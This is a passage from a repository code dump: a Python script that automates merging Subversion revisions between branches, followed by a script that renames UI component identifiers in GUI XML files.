r\"C:/Program Files/Beyond Compare 4/BComp.exe\"\n\nAUTHOR = None\nREVISION = None\nPATH_FROM = None\nPATH_TO = None\nPATH_FROM_NAME = None\n\n# Index: arena/test.lua\n# ===================================================================\n# --- arena/test.lua (revision 62120)\n# +++ arena/test.lua (revision 62121)\n# @@ -63,7 +63,7 @@\nP_ONEPATCH = r'Index:\\s(.*)\\r?\\n={30,}\\r?\\n'\n\nclass Patch:\n \"\"\"docstring for Patch\"\"\"\n __slots__ = ('path', 'content', 'revision', 'names')\n def __init__(self, content, revision):\n # self.path = arg[0]\n # self.names = arg[1]\n self.content = content\n self.revision = revision\n\n# return (output, isOk)\ndef call(cmd, worddir = None, printOutput=False):\n # print(\"call %s\" % cmd)\n output = None\n isOk = True\n if sys.platform == 'win32':\n args = cmd\n else:\n # linux must split arguments\n args = shlex.split(cmd)\n\n if printOutput:\n popen = subprocess.Popen(args, cwd = worddir)\n popen.wait()\n isOk = popen.returncode == 0\n else:\n popen = subprocess.Popen(args, cwd = worddir, stdout = subprocess.PIPE)\n outData, errorData = popen.communicate()\n if sys.version_info >= (3, 0):\n outData = str(outData, encoding = 'utf8')\n isOk = popen.returncode == 0\n output = outData if isOk else errorData\n return (output, isOk)\n\ndef getRevisions():\n cmd = '\"%s\" log -q -r %d:HEAD --xml --search %s' % (SVN, REVISION, AUTHOR)\n output, isOk = call(cmd, PATH_FROM)\n if not isOk:\n # print(output)\n raise Exception('svnerror', output)\n\n root = ET.fromstring(output)\n\n # print 
len(arr)\n revs = []\n for logentry in root.findall('logentry'):\n author = logentry.find('author').text\n if author == AUTHOR:\n revs.append(int(logentry.get('revision')))\n\n return revs\n\n\n\ndef getLogMsg(revs):\n slist = []\n cmd = '\"%s\" log -r %%d --xml' % SVN\n for rev in revs:\n output, isOk = call(cmd % rev, PATH_FROM)\n if not isOk:\n # print(output)\n raise Exception('svnerror', output)\n\n root = ET.fromstring(output)\n\n for logentry in root.findall('logentry'):\n msg = logentry.find('msg').text\n msg = msg.strip()\n if len(msg) > 0 and msg not in slist:\n slist.append(msg)\n\n return '\\n'.join(slist)\n\ndef createPatch(content, rev):\n # print(content)\n patch = Patch(content, rev)\n patch.names = re.findall(P_ONEPATCH, content)\n\n if sys.version_info >= (3, 0):\n content = content.encode(encoding = 'utf8')\n\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(content)\n f.close()\n patch.path = f.name\n # print(f.name)\n\n return patch\n\ndef getPatchs(revisions):\n patchs = []\n for rev in revisions:\n output, isOk = call('\"%s\" diff -c %d' % (SVN, rev), PATH_FROM)\n if not isOk:\n raise Exception('svn diff', output)\n\n patchs.append(createPatch(output, rev))\n return patchs\n\n\ndef applyPatchs(patchs):\n for patch in patchs:\n output, isOk = call('\"%s\" patch %s' % (SVN, patch.path), PATH_TO)\n if not isOk:\n raise Exception('svn patch', output)\n else:\n print(output)\n\ndef openCampare(patchs):\n names = set()\n for patch in patchs:\n names.update(patch.names)\n filters = ';'.join(names)\n\n output, isOk = call('%s /iu /filters=\"%s\" %s %s' % (BComp, filters, PATH_FROM, PATH_TO))\n print(output)\n\n\ndef commitPatchs(patchs, msg):\n revisions = ','.join([str(p.revision) for p in patchs])\n logmsg = \"merge from %s %s\\n%s\" % (PATH_FROM_NAME, revisions, msg)\n output, isOk = call('\"%s\" /command:commit /closeonend:0 /path:\"%s\" /logmsg:\"%s\"' % (TortoiseSVN, PATH_TO, logmsg))\n print(output, isOk)\n return isOk\n\ndef updateRepository(path):\n call('%s update \"%s\"' % (SVN, path), printOutput = True)\n\ndef readfile(filename):\n if not os.path.exists(filename):\n raise Exception('can not found file: %s' % filename)\n with open(filename) as f:\n data = f.read()\n f.close()\n return data\n\ndef writefile(filename, data):\n with open(filename, 'w') as f:\n f.write(data)\n f.close()\n\ndef readConfig(path, branch):\n global AUTHOR, PATH_FROM, PATH_TO, REVISION, PATH_FROM_NAME\n j = json.loads(readfile(path))\n AUTHOR = j['author']\n PATH_FROM_NAME = j['from']\n PATH_FROM = branch[j['from']]\n PATH_TO = branch[j['to']]\n REVISION = j['reversion']\n return j\n\ndef writeConfig(path, config):\n data = json.dumps(config, indent = 4)\n writefile(path, data)\n\n# -------------- main ----------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='%(prog)s [options] config',\n description='merge svn from $from to $to')\n parser.add_argument('config', \n help='config file')\n parser.add_argument('-b', '--branchs', default = 'branch.json',\n help='branchs config file(default: branch.json)')\n parser.add_argument('-o', '--origin',\n help='from branch')\n parser.add_argument('-t', '--to',\n help='to branch')\n parser.add_argument('-r', '--revs', nargs='*', type=int,\n help='reversion list')\n\n args = parser.parse_args()\n # print(args.config)\n \n\n branchs = dict();\n branchPath = args.branchs\n if not branchPath.endswith('.json'):\n branchPath = branchPath + '.json'\n branchs = json.loads(readfile(branchPath))\n\n configPath = 
os.path.abspath(args.config)\n if not configPath.endswith('.json'):\n configPath = configPath + '.json'\n config = readConfig(configPath, branchs)\n\n dontSave = False\n if args.origin is not None:\n if args.origin not in branchs:\n raise Exception('can not found origin branch' + origin)\n PATH_FROM = branchs[args.origin]\n PATH_FROM_NAME = args.origin\n dontSave = True\n\n if args.to is not None:\n if args.to not in branchs:\n raise Exception('can not found to branch' + to)\n PATH_TO = branchs[args.to]\n dontSave = True\n\n updateRepository(PATH_TO)\n\n revs = [] if args.revs is None else args.revs[:]\n if len(revs) > 0:\n revs.sort()\n dontSave = True\n else:\n revs = getRevisions()\n\n print(revs)\n if len(revs) == 0:\n print('have not new reversion')\n else:\n msg = getLogMsg(revs)\n patchs = getPatchs(revs)\n applyPatchs(patchs)\n openCampare(patchs)\n if commitPatchs(patchs, msg):\n lastReversion = revs[-1]\n config['reversion'] = lastReversion + 1\n config['lastReversion'] = lastReversion\n if not dontSave:\n writeConfig(configPath, config)\n\n # commitPatchs(None)\n" }, { "alpha_fraction": 0.5933797359466553, "alphanum_fraction": 0.6187700033187866, "avg_line_length": 46.900901794433594, "blob_id": "fd137d2512f292d46173a7a08161ce3beabc449c", "content_id": "d588df3f34ccc6abe28e80ac836f77dc87acbde7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5325, "license_type": "no_license", "max_line_length": 784, "num_lines": 111, "path": "/renameComps.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n# pip install openpyxl\n# pip install pyyaml\n\nimport os, os.path\nimport re\nimport argparse\nfrom function import readfile, writefile, writeyaml\n\n# <com.g2d.studio.ui.edit.gui.UELabel Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" height=\"30\" local_bounds=\"0,0,60,30\" lock=\"true\" name=\"lb_title\" text=\"动作\" textBorderAlpha=\"0.0\" textBorderColor=\"0\" textColor=\"ffffffff\" textFont=\"\" textFontSize=\"20\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"60\" x=\"130.0\" y=\"4.0\" z=\"0.0\"/>\n# <com.g2d.studio.ui.edit.gui.UEButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"35\" imageAnchor=\"C_C\" imageAtlasDown=\"\" imageAtlasUp=\"\" imageOffsetX=\"0\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" local_bounds=\"0,0,35,35\" lock=\"true\" name=\"btn_close\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"35\" x=\"807.0\" y=\"-3.0\" z=\"0.0\">\n# <com.g2d.studio.ui.edit.gui.UEToggleButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"78\" imageAnchor=\"C_C\" imageAtlasDown=\"#dynamic/associate/output/associate.xml|associate|9\" imageAtlasUp=\"#dynamic/associate/output/associate.xml|associate|11\" imageOffsetX=\"-15\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" isChecked=\"true\" 
local_bounds=\"0,0,121,78\" lock=\"true\" name=\"tbt_an1\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"121\" x=\"0.0\" y=\"30.0\" z=\"0.0\">\n# PATTERN = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.(UELabel|UEButton|UEToggleButton) .*? name=\")([^\"]+)(\" .*text=\")([^\"]+)(\".*)$'\n# P_BUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEButton .*? name=\")(btn_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n# P_TBUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEToggleButton .*? name=\")(tbt_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n\nCOMPS_PREFIX = {\n \"UELabel\" : \"lb_\",\n \"UEButton\" : \"btn_\",\n \"UEToggleButton\" : \"tbt_\",\n \"UECheckBox\" : \"cb_\",\n \"UEImageBox\" : \"ib_\",\n \"UETextInput\" : \"ti_\",\n \"UETextBox\" : \"tb_\",\n \"UETextBoxHtml\" : \"tbh_\",\n \"UEGauge\" : \"gg_\",\n \"UEScrollPan\" : \"sp_\",\n \"UECanvas\" : \"cvs_\",\n \"UEFileNode\" : \"fn_\",\n # \"UETextInputMultiline\": \"tbt_\",\n}\n\n\narr = [r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.)(']\nfor k, v in COMPS_PREFIX.iteritems():\n arr.append(k)\n arr.append('|')\narr.pop()\narr.append(r')(.*? name=\")([^\"]+)(\".*)$')\nPATTERN = ''.join(arr)\n# print('PATTERN', PATTERN)\n\n# for k, v in COMPS_PREFIX.iteritems():\n# name = 'cs_'\n# ratio = difflib.SequenceMatcher(None, name, v).ratio()\n# print(v, name, ratio)\n\n# return newname\ndef checkName(type, name):\n prefix = COMPS_PREFIX[type]\n if name[0:len(prefix)] == prefix:\n return name\n arr = name.split('_', 1)\n if len(arr) == 1:\n return prefix + name\n return prefix + arr[1]\n\ndef renameContent(data):\n pairMap = dict()\n def f(g):\n type = g.group(2)\n name = g.group(4)\n newname = checkName(type, name)\n if name == newname:\n return g.group(0)\n key = '%s;%s' % (name, newname)\n pair = pairMap.get(key, [name, newname, 0])\n pair[2] = pair[2] + 1\n pairMap[key] = pair\n return ''.join([g.group(1), type, g.group(3), newname, g.group(5)])\n return (re.sub(PATTERN, f, data, 0, re.M), pairMap)\n\ndef renameFile(baseDir, dir, name, errors):\n filename = os.path.join(dir, name)\n data = readfile(filename)\n newdata, pairMap = renameContent(data)\n writefile(filename, newdata)\n if len(pairMap) > 0:\n relname = os.path.relpath(filename, baseDir)\n errors.append((relname, pairMap.values()))\n\n# baseDir 目录\n# errors <(filename, [oldname, newname, count])>\ndef renameDir(baseDir, errors):\n for root, dirs, files in os.walk(baseDir):\n for f in files:\n if f.endswith('.gui.xml'):\n renameFile(baseDir, root, f, errors)\n\n\n#-------------- main ----------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='%(prog)s [options] config',\n description='rename components name')\n parser.add_argument('xmldir', \n help='xmldir')\n parser.add_argument('-o', '--out', \n help='log file')\n\n args = parser.parse_args()\n errors = []\n xmldir = os.path.abspath(args.xmldir).decode('utf-8').encode('gb2312')\n logfile = args.out\n if logfile is not None:\n logfile = os.path.abspath(logfile).decode('utf-8').encode('gb2312')\n renameDir(xmldir, errors)\n\n if len(errors) > 0:\n from renderhtml import renderhtml\n renderhtml(errors, (\"oldname\", \"newname\", \"count\"), logfile)\n" } ]
6
karsiyakalilar/water-project
https://github.com/karsiyakalilar/water-project
0bc9eb39081984eda15d487c843a15979c0c5705
9bbc36a429bdf8c145408ed01b61338a5e3bf6d9
dff6c46cb8c450dd4228dab129471e7f2958f992
refs/heads/master
2021-01-12T03:12:20.825554
2017-01-15T17:37:25
2017-01-15T17:37:25
78,173,403
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5528714656829834, "alphanum_fraction": 0.5770282745361328, "avg_line_length": 31.029197692871094, "blob_id": "6d3a5bf836c0f641fbb1def8553d75cd255e4eeb", "content_id": "8fba45a38c7150d8de631ff6eb7c6363d93d4d99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4388, "license_type": "no_license", "max_line_length": 91, "num_lines": 137, "path": "/gen_watermark.py", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "# modified version of http://code.activestate.com/recipes/362879/\nfrom PIL import Image, ImageEnhance\nimport random\n\ndef flip_horizontal(im): return im.transpose(Image.FLIP_LEFT_RIGHT)\ndef flip_vertical(im): return im.transpose(Image.FLIP_TOP_BOTTOM)\ndef rotate_180(im): return im.transpose(Image.ROTATE_180)\ndef rotate_90(im): return im.transpose(Image.ROTATE_90)\ndef rotate_270(im): return im.transpose(Image.ROTATE_270)\ndef transpose(im): return rotate_90(flip_horizontal(im))\ndef transverse(im): return rotate_90(flip_vertical(im))\norientation_funcs = [None,\n lambda x: x,\n flip_horizontal,\n rotate_180,\n flip_vertical,\n transpose,\n rotate_270,\n transverse,\n rotate_90\n ]\ndef apply_orientation(im):\n \"\"\"\n Extract the oritentation EXIF tag from the image, which should be a PIL Image instance,\n and if there is an orientation tag that would rotate the image, apply that rotation to\n the Image instance given to do an in-place rotation.\n\n :param Image im: Image instance to inspect\n :return: A possibly transposed image instance\n \"\"\"\n\n try:\n kOrientationEXIFTag = 0x0112\n if hasattr(im, '_getexif'): # only present in JPEGs\n e = im._getexif() # returns None if no EXIF data\n if e is not None:\n print(\"exif found\")\n orientation = e[kOrientationEXIFTag]\n f = orientation_funcs[orientation]\n return f(im)\n else:\n print(\"exif exists as a func but no value returned\")\n return im\n else:\n print(\"no exif found\")\n return im\n\n except:\n print(\"problem applying orientation to the image\")\n return(im)\n\ndef reduce_opacity(im, opacity):\n \"\"\"Returns an image with reduced opacity.\"\"\"\n assert opacity >= 0 and opacity <= 1\n if im.mode != 'RGBA':\n im = im.convert('RGBA')\n else:\n im = im.copy()\n alpha = im.split()[3]\n alpha = ImageEnhance.Brightness(alpha).enhance(opacity)\n im.putalpha(alpha)\n return im\n\ndef watermark(im, mark, position, opacity=1):\n \"\"\"\n Adds a watermark to an image.\n change opacity\n apply orientation\n resize image\n apply watermark\n \"\"\"\n # change opacity\n if opacity < 1:\n mark = reduce_opacity(mark, opacity)\n\n # if im.mode != 'RGBA':\n # im = im.convert('RGBA')\n\n # apply orientation\n im = apply_orientation(im)\n\n # resize image\n if max(im.size) > 1000:\n _aspect_ratio = float(im.size[0]) / float(im.size[1])\n if _aspect_ratio >= 1:\n new_width = 1000\n new_height = int(1000 / _aspect_ratio)\n else:\n new_height = 1000\n new_width = int(1000 * _aspect_ratio)\n\n im = im.resize((new_width, new_height), Image.ANTIALIAS)\n\n # apply watermark\n layer = Image.new('RGBA', im.size, (0,0,0,0))\n if position == 'tile':\n for y in range(0, im.size[1], mark.size[1]):\n for x in range(0, im.size[0], mark.size[0]):\n layer.paste(mark, (x, y))\n elif position == 'scale':\n # crop off extras\n # either diffs[0] or diffs[1] is 0\n diffs = (mark.size[0] - im.size[0], mark.size[1] - im.size[1])\n mark = mark.crop((0, 0, \n mark.size[0] - diffs[0], \n mark.size[1] - diffs[1]))\n layer.paste(mark, (0,0))\n else:\n 
layer.paste(mark, position)\n \n # composite the watermark with the layer\n print(\"generated image\")\n return Image.composite(layer, im, layer)\n\ndef generate(img_path, out_path, watermark_path):\n print(img_path)\n print(out_path)\n print(watermark_path)\n im = Image.open(img_path)\n mark = Image.open(watermark_path)\n print(\"generating image\") \n watermark(im, mark,\n # position=(0,0),\n position=\"scale\",\n opacity=0.5).save(out_path, 'JPEG')\n\ndef test():\n img_path = \"./uploads/IMG_0014.JPG\"\n out_path = \"./target_images/wm_IMG_0014.JPG\"\n watermark_path = \"./assets/water.png\"\n generate(img_path, out_path, watermark_path)\n\nif __name__ == \"__main__\":\n test()\n # generate(\"./uploads/test2.jpg\",\n # \"./targets/wm_test2.jpg\",\n # \"./assets/water.png\")\n" }, { "alpha_fraction": 0.6592168807983398, "alphanum_fraction": 0.6638655662536621, "avg_line_length": 35.318180084228516, "blob_id": "c04dc79ec21b04bb4a85ba474fc5288eb9e6f506", "content_id": "02e14e7bafa543f8666ca4ac729f1d001ed81fc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5593, "license_type": "no_license", "max_line_length": 97, "num_lines": 154, "path": "/app.py", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "\"\"\"\n This is an image processing micro-app for \"We-Are-Water\"\n It uses Flask to serve a landing page where a client can\n apply a watermark to their images\n\n Images are temporarily stored in a ./uploads folder\n and are processed and saved to ./target_images \n and are returned to the client\n\n A scheduled maintenance jobs cleans upload directories ever so often\n\n\"\"\"\nimport os\n# We'll render HTML templates and access data sent by POST\n# using the request object from flask. 
Redirect and url_for\n# will be used to redirect the user once the upload is done\n# and send_from_directory will help us to send/show on the\n# browser the file that the user just uploaded\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory\nfrom werkzeug import secure_filename\nfrom gen_watermark import generate\n\nimport glob\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n# Constants\nFIVER = 5\nFIFTEEN_MINUTES = 60 * 15\nTHRITY_MINUTES = 60 * 30\nHOURLY = 60 * 60\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n# This is the path to the upload directory\napp.config['UPLOAD_FOLDER'] = './uploads/'\napp.config['TARGET_FOLDER'] = './target_images/'\napp.config['ASSET_FOLDER'] = './assets/'\napp.config[\"WATERMARK_IMAGE\"] = \"./assets/water_lighter.png\"\n\n# These are the extension that we are accepting to be uploaded\napp.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg', 'JPG', 'JPEG'])\n\n## start and schedule jobs\ndef maintain_dirs():\n \"\"\"\n Checks upload and target directories and removes file if necessary\n \"\"\"\n with app.app_context():\n upload_folder = app.config['UPLOAD_FOLDER']\n target_images_folder = app.config[\"TARGET_FOLDER\"]\n\n current_uploaded_items = glob.glob(upload_folder + \"*\")\n current_target_folder_items = glob.glob(target_images_folder + \"wm_*\")\n\n if len(current_uploaded_items) > 0:\n print(\"upload folder count: %s \" % len(current_uploaded_items))\n [os.remove(i) for i in current_uploaded_items]\n else:\n print(\"nothing to remove in upload folder\")\n\n if len(current_target_folder_items) > 0:\n print(\"target folder count: %s \" % len(current_target_folder_items))\n [os.remove(i) for i in current_target_folder_items]\n \n else:\n print(\"nothing to remove in target folder\")\n\napsched = BackgroundScheduler()\napsched.add_job(maintain_dirs, 'interval', seconds=THRITY_MINUTES)\napsched.start()\n## TODO: refactor into a different file\nprint(\"Initialized mainter\")\n\n# For a given file, return whether it's an allowed type or not\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n# This route will show a form to perform an AJAX request\n# jQuery is loaded to execute the request and update the\n# value of the operation\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n# Route that will process the file upload\n@app.route('/upload', methods=['POST'])\ndef upload():\n # Get the name of the uploaded file\n file = request.files['file']\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n\n # Move the file form the temporal folder to\n # the upload folder we setup\n full_originating_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(full_originating_path)\n \n watermarked_image_name = \"wm_\" + filename\n full_destination_path = os.path.join(app.config['TARGET_FOLDER'], watermarked_image_name)\n\n try:\n print(\"Generating watermark\")\n generate(full_originating_path, \n full_destination_path,\n app.config[\"WATERMARK_IMAGE\"])\n except:\n print(\"Something went wrong\")\n return redirect(url_for('err_file'), filename=\"something_wrong\")\n\n # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n print(\"Giving the uploaded file back\")\n return redirect(url_for('target_file',\n filename=watermarked_image_name))\n\n# This route is expecting a parameter containing the name\n# of a file. Then it will locate that file on the upload\n# directory and show it on the browser, so if the user uploads\n# an image, that image is going to be show after the upload\n@app.route('/uploads/<filename>')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n@app.route('/err/<filename>')\ndef err_file(filename):\n return send_from_directory(app.config['ASSET_FOLDER'],\n filename)\n\n@app.route('/targets/<filename>')\ndef target_file(filename):\n return render_template('target.html', \n imageURL=url_for('target_images', filename=filename))\n # imageURL=os.path.join(app.config['TARGET_FOLDER'], filename))\n\n@app.route('/target_images/<filename>')\ndef target_images(filename):\n return send_from_directory(app.config['TARGET_FOLDER'],filename)\n\n\nif __name__ == '__main__':\n app.run(\n host=\"0.0.0.0\",\n port=int(\"8000\"),\n debug=True\n )\n\n\n# using the scaffold code from here:\n# http://code.runnable.com/UhLMQLffO1YSAADK/handle-a-post-request-in-flask-for-python\n" }, { "alpha_fraction": 0.49275362491607666, "alphanum_fraction": 0.695652186870575, "avg_line_length": 16.25, "blob_id": "3504c42d05ac31b680d55f2ecbf2214d6020904b", "content_id": "4965b44029f6d7c07e7b6d34a3bfd9d507d7f783", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 69, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/requirements.txt", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "APScheduler==3.3.1\ndecorator==4.0.10\nFlask==0.11.1\nFlask-Cors==2.1.2\n" }, { "alpha_fraction": 0.747989296913147, "alphanum_fraction": 0.7640750408172607, "avg_line_length": 30.08333396911621, "blob_id": "a5f7138e073a7b7bf3e735ccb19b0083ffec39cd", "content_id": "184b34b2cb5131988aae89aa3a639840165853e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 373, "license_type": 
"no_license", "max_line_length": 104, "num_lines": 12, "path": "/README.md", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "#### Tweebo clone watermark avatar generator for *We are water* social awareness campaign\n\nOnce you install the dependencies\n\n`pip install requirements.txt`\n\nyou can simply run `python app.py`\n\nApp by default binds to `port=8000i` and runs a scheduled maintenance job that clears all upload folders\n\n![](./uploads/library3-big.jpg)\n![](./target_images/wm_library3-big.jpg)\n" }, { "alpha_fraction": 0.6483970880508423, "alphanum_fraction": 0.6639090180397034, "avg_line_length": 27.47058868408203, "blob_id": "e3d787e1791e6127783481e0d7383bc0d1c4a57d", "content_id": "4c876181071222c09df8feb9668bd091752f844f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 967, "license_type": "no_license", "max_line_length": 76, "num_lines": 34, "path": "/maintainer.py", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "import os\nimport glob\nfrom apscheduler.scheduler import Scheduler\n\n\ndef maintain_dirs():\n \"\"\"\n Checks upload and target directories and cleans\n \"\"\"\n with app.app_context():\n upload_folder = app.config['UPLOAD_FOLDER']\n target_images_folder = app.config[\"TARGET_FOLDER\"]\n\n current_uploaded_items = glob.glob(upload_folder + \"*\")\n current_target_folder_items = glob.glob(target_images_folder, \"wm_*\")\n\n if len(current_uploaded_items) > 0:\n print(\"upload folder count: %s \" % len(current_uploaded_items))\n print(\"removing yoself\")\n\n if len(current_target_folder_items) > 0:\n print(\"target folder count: %s \" % len(current_target_folder_items))\n print(\"removing yoself\")\n\nFIVER = 5\nFIFTEEN_MINUTES = 60 * 15\nTHRITY_MINUTES = 60 * 30\nHOURLY = 60 * 60\n\n@app.before_first_request\ndef initialize():\n apsched = Scheduler()\n apsched.start()\n apsched.add_interval_job(maintain_dirs, seconds=FIVER)" } ]
5
LeeJumi/blog-formproject
https://github.com/LeeJumi/blog-formproject
a0fd934e3b8199e941c4dff657922b6aea540c65
3f7a00b6846667f51bbb8b2cc221e60627d77249
60c0c4fa43760bd35cf586954cd9e1bbbaf4b1e3
refs/heads/master
2022-08-04T12:01:17.880931
2020-05-30T11:32:24
2020-05-30T11:32:24
268,066,934
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6417419910430908, "alphanum_fraction": 0.6417419910430908, "avg_line_length": 35.90909194946289, "blob_id": "a5b8bed0e815eec879f10de949a98eee6f15e707", "content_id": "f77d88759d7afdfb53fe5a1f969c7f437c6a0361", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1547, "license_type": "no_license", "max_line_length": 95, "num_lines": 33, "path": "/hello/views.py", "repo_name": "LeeJumi/blog-formproject", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom .models import Blog #모델의 존재를 알려주는 코드\nfrom django.utils import timezone #장고 안에 있는 타임존을 임포트하라는 뜻\nfrom .forms import BlogPost\n# Create your views here.\ndef home(request):\n blog = Blog.objects.all() #blog라는 변수안에 Blog모델의 objects객체 all()전부를 넣어줘\n return render(request,'home.html',{'blogs':blog})#blog에 담은 것들을 blogs라는 이름으로 home.html에 전해줘\n\n\ndef create(request):\n if request.method == 'POST': #POST로 요청이 들어오면 \n blog = Blog()#Blog 모델의 내용들을 blog라는 변수에 담고\n blog.title = request.POST['title'] #블로그라는 이름에 담긴 내용을 타이틀이란 이름으로 가져옴\n blog.body = request.POST['body'] #블로그라는 이름에 담긴 내용을 바디이란 이름으로 가져옴 (바디라고 모델에 적었으니 통일시켜야함)\n blog.pub_date = timezone.datetime.now()#시간을 가져올 것\n blog.save()#블로그를 저장할 것\n\n return redirect('/') \n else:\n return render(request, 'create.html')\n\ndef blogpost(request):\n if request.method =='POST':\n form = BlogPost(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.pub_date=timezone.now()\n post.save()\n return redirect('home')\n else:\n form = BlogPost()\n return render(request,'new.html',{'forms':form})" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 28, "blob_id": "ac3d9731837302a86c8291e947d7bd01add34602", "content_id": "b81458f13b75fc3a67820f0574345b242e9aa344", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 28, "num_lines": 1, "path": "/hello/url.py", "repo_name": "LeeJumi/blog-formproject", "src_encoding": "UTF-8", "text": "\n\n#코드오류를 해결할 수 없어 이부분은 생략했습니다." }, { "alpha_fraction": 0.7289377450942993, "alphanum_fraction": 0.7289377450942993, "avg_line_length": 35.06666564941406, "blob_id": "2b6c1fb06340bbf27a4cb35ff0d646b8d0acca9a", "content_id": "8e5465f7c221231bf0957eb84d6994cd3b939fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 546, "license_type": "no_license", "max_line_length": 76, "num_lines": 15, "path": "/firstsite/urls.py", "repo_name": "LeeJumi/blog-formproject", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.urls import path\nimport hello.views\nimport portfolio.views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', hello.views.home, name='home'),\n path('newblog/',hello.views.blogpost, name=\"newblog\"),\n path('create/',hello.views.create, name='create'),\n path('portfolio/', portfolio.views.portfolio, name='portfolio'),\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n\n\n\n" } ]
3
timgates42/pyramid_mailgun
https://github.com/timgates42/pyramid_mailgun
7ee9e36ac9e72687e120e27d2497db73ebd61771
f056f269cd2977dad583fc35a56fc01a4d2761a2
e1b25c52d706293b4e32140440a21271aad8e585
refs/heads/master
2021-05-17T23:22:55.942739
2016-01-28T01:11:39
2016-01-28T01:11:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6269592642784119, "alphanum_fraction": 0.6394984126091003, "avg_line_length": 28, "blob_id": "ca5acda3e4486d3f5f79715a74f682045157214e", "content_id": "e12448347c93debc3d220fa0921928d170a47bc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 638, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/setup.py", "repo_name": "timgates42/pyramid_mailgun", "src_encoding": "UTF-8", "text": "try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nsetup(\n name='pyramid_mailgun',\n version='0.0.3dev',\n packages=['pyramid_mailgun',],\n description='Mailgun integration for Pyramid framework',\n author='Evan Nook',\n author_email='evan@innonook.com',\n url='https://github.com/evannook/pyramid_mailgun',\n license='MIT',\n long_description=open('README.txt').read(),\n install_requires = ['requests'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ]\n)\n" }, { "alpha_fraction": 0.6089385747909546, "alphanum_fraction": 0.6108007431030273, "avg_line_length": 27.263158798217773, "blob_id": 